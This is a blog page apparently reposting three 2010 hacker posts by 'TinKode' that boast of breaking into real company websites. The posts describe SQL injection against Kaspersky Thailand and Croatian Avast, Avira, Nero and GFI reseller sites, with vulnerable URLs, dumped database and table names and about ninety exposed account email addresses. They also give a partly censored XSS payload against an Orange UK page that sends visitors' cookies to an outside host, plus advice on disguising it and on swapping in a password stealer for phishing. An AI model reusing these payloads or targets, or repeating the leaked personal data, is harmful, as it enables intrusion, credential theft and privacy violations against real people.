Wednesday, February 1, 2012

TinKode-Kaspersky Thailand Full Access

9:19 PM  Admin  No comments


Kaspersky Thailand Full Access

Posted by isrtinkode on February 19, 2010
 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker
Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.
Testing:






Main Informations:

#Version: 5.1.30
#censored
#censored
#censored
All databases:
#information_schema
#censored
#censored
Tables from thaikasp_dealer:

#censored
#newheader
#tb_dealer
#tb_part
Tables from thaikasp_forum:
#forum
#tbmember
Columns from tbmember
#ID
#Username
#Password
And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#censored
#censored
#censored
#censored
Admin Control Panel:


Yeah, finish.
Bye, TinKode

Read More

TinKode-Orange Vulnerable to XSS and phishing

9:17 PM  Admin  No comments


Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

Read More

TinKode-Avast,Avira,Nero Full Disclosure Accounts Exposed

9:15 PM  Admin  No comments


Avast,Avira,Nero Full Disclosure Accounts Exposed

Posted by isrtinkode on February 28, 2010
                       _                  _             _   _
    /\                | |       /\       (_)           | \ | |
   /  \__   ____ _ ___| |_     /  \__   ___ _ __ __ _  |  \| | ___ _ __ ___
  / /\ \ \ / / _` / __| __|   / /\ \ \ / / | '__/ _` | | . ` |/ _ \ '__/ _ \
 / ____ \ V / (_| \__ \ |_ _ / ____ \ V /| | | | (_| |_| |\  |  __/ | | (_) |
/_/    \_\_/ \__,_|___/\__( )_/    \_\_/ |_|_|  \__,_( )_| \_|\___|_|  \___/
                          |/                         |/
                                     #TinKode & Jackhax0r @ Full Disclosure
Informations:
Company Miam-Veri d.o.o is a representative of avast! products for the Republic of Croatia.
Miam-Veri d.o.o. is reseller for Avast! Antivirus, GFI Software, Adobe and Nero VLP.
Avira Antivirus
Avast! – Computer virus, worm and Trojan protection
GFI – Fax server, Exchange and network software
Adobe – Print, design and publishing software
Nero VLP – All-In-One Digital Media Solutions
Vulnerable links:
Avast: http://www.avast.software.hr/detalji.asp?ID=9
GFI: http://gfi.software.hr/detalji.asp?ID=7
Nero: http://nero.software.hr/detalji.asp?ID=67
Avira: http://avira.software.hr/detalji.asp?ID=6
Testing:



Main Informations:
[*]Version = Microsoft SQL Server 2005 – 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
[*]Current User = censored
[*]Current Database = censored
[*]Server = Microsoft-IIS/6.0
Screen:
All Databases (46):
censored
master
tempdb
model
msdb
ASPNETDB
dnn_zupa
GalaTest
hram-zdravlja-dnn
codeit
tiashop
radio_ivanec_hr_dnn
gipsmont-cosic
drvodjelac_hr_dnn
hps_hr_dnn
moto_gume_com_vs
kridom2
kridomhr
EMOS_ZG
Nekretnine
nnmkor
oglasnik
emitri_hr_emitri
24sata2
novi-informatorProduction
rideatrain
mdosobnidnevnik
CY_2008
CYRacuni
testMISO3
croatia_rab_net_katalog
dracomerx_hr_CompanyWeb
mojkompjuter_com_mojkompjuter
lglas
motoklub_cms
POSLOVNIPROSTOR
vs-baterije
rituals
FRIGOTEHNIKA
knjiga
shop_manitabo_com_vs
bednja_hr_baza
9A4DK_com_dnn
TicketTool
split_itportal_com_CompanyWeb
vs-marjan-tisak
Tables from main database “censored“:
DJELATNOSTI
FINTAB
Komentar
KomentarPoslovanja
KontrolaNaloga
KontrolaNalogaPojedinac
KontrolaNalogaTemp
Limiti
LOG
OBRASCI
OBVEZNIK
OPCI1
OPCI2
OPERATERI
POGRESKE
Pokazatelji
PonudeHyperion2
PonudeH
TA
TAB_ZAG
TABBC101
TABBC102
TABBC103
TABDE101
TABDE102
TABDE103
TABLICE
ZAGLAV
TFI-POD
vVrijednosnica
vVrijednosnicaTFI
AvastAdmin
AvastTecaj
AvastTempNar
AvastKategorije
AvastNarproizvod
AvastNarudzbe
AvastNaslovna
AvastProgrami
KontniPlan
Racuni
RacuniDet
Ponude
PonudeDet
AviraKategorije
AviraPopis
AvastPopis
AvastProizvodi
AviraProizvodi
AvastIsplata
NeroKategorije
NeroProizvodi
AvastKorisnici
Kupci
AvastKupci
Columns from table “censored“:
Username: censored
Password:censored

OMG! WTF IS THAT? O_o
Accounts from “censored“:
Username : Password : Email
censoredcensored–avast@software.hr
censoredcensored–info@infoplanet.hr
censoredcensored–eksa-bit@ri.t-com.hrcensored–censored–brkaric@gmail.com
censoredcensored–kontakt@aero-racunala.hr
censoredcensored–info@diskont24.com
censoredcensored–damir@node.hr
censoredcensored–info@najkomp.hr
censoredcensored–servis@ultimus.hr; shop@ultimu
censoredcensored–amisa@amisa.hr
censoredcensored–info@vobis.hr
censoredcensored–partner.avast@signon.hr
censoredcensored–fran.baca@knjigice.com
censoredcensored–info@chloris-informatika.hr
censoredcensored–olicomp@optinet.hr
censoredcensored–instar@instar-informatika.hr
censoredcensored–magazinrs@magazinrs.hr
censoredcensored–kreso@cio.hr
censoredcensored–edrazenovic@gmail.com
censoredcensored–alen@besoft.hr
censoredcensored–mprahin@gmail.com
censoredcensored–1990ivan.maric@gmail.com
censoredcensored–tspinjac@gmail.com
censoredcensored–optima@optima-zadar.hr
censoredcensored–hturcin@hotmail.com
censoredcensored–danko@adm.hr
censoredcensored–mpasicko@gmail.com
censoredcensored–faithfry@gmail.com
censoredcensored–sasa.jovanovic@inet.hr
censoredcensored–prut@email.com
censoredcensored–dsajcic@gmail.com
censoredcensored–marko.pecatnik@gmail.com
censoredcensored–dominik.dusak@gmail.com
censoredcensored–valter.stemberga2@gmail.com
censoredcensored–slavica.zubak@hotmail.com
censoredcensored–hrvoje.humski@gmail.com
censoredcensored–antonio@software.hr
censoredcensored–info@studio-slatina.hr
censoredcensored–damir.hlaj@ka.t-com.hr
censoredcensored–frediienator@gmail.com
censoredcensored–bojan.podnar@gmail.com
censoredcensored–igorkolar25@gmail.com
censoredcensored–zlajamaxi@gmail.com
censoredcensored–grimir69@net.hr
censoredcensored–npavic_82@yahoo.com
censoredcensored–albukvic@gmail.com
censoredcensored–dlistes@gmail.com
censoredcensored–stzizic@gmail.com
censoredcensored–samuel.koprivnjak@gmail.com
censoredcensored–marin.farkas@gmail.com
censoredcensored–tomislav.parcina@gmail.com
censoredcensored–vklen@net.hr
censoredcensored–dlonjak@ffos.hr
censoredcensored–osjecko2@gmail.com
censoredcensored–miro.sertic@email.t-com.hr
censoredcensored–milolozaantonio@yahoo.com
censoredcensored–jogalic@gmail.com
censoredcensored–robimlinar@gmail.com
censoredcensored–josip.crnicki@gmail.com
censoredcensored–antisa1@optinet.hr
censoredcensored–braneweb@gmail.com
censoredcensored–ninovukic@gmail.com
censoredcensored–e.one@post.t-com.hr
censoredcensored–fran.jadrijev@hotmail.com
censoredcensored–houseboki@gmail.com
censoredcensored–som@somware.hr
censoredcensored–info@studio-bonet.com
censoredcensored–skydiver.extreme@gmail.com
censoredcensored–nik238@net.hr
censoredcensored–odiriuss@gmail.com
censoredcensored–mario44@net.hr
censoredcensored–marina.velat@gmail.com
censoredcensored–nikolavlacic@gmail.com
censoredcensored–eomersblood@gmail.com
censoredcensored–doris.fiume@gmail.com
censoredcensored–vjeran555@yahoo.com
censoredcensored–dumbovic@gmail.com
censoredcensored–shogo.cro@gmail.com
censoredcensored–vanja.rain@hi.t-com.hr
censoredcensored–mladen.basic@email.t-com.hr
censoredcensored–lahor.enc@sk.htnet.hr
censoredcensored–mate.barbaric@gmail.com
censoredcensored–mestrovic.ma@gmail.com
censoredcensored–Z.HRVOIC@vip.hr
censoredcensored–binogrupa@bino.hr
censoredcensored–info@pixma-itshop.com
censoredcensored–vekkica@hotmail.com
censoredcensored–goran.nxn@gmail.com
censoredcensored–castoos@gmail.com
censoredcensored–brkcomp@brkcomp.hr
censoredcensored–ivanvalentic81@gmail.com
censoredcensored–ivan.cajkovac@gmail.com
censoredcensored–binder.jo@gmail.com
[LOL]
So, all official reprezentative websites of Avast, Avira, Nero, GFI created by Miam-Veri D.O.O are vulnerable!
Great!
~TinKode
~Never forgot the power of silence! :)

Read More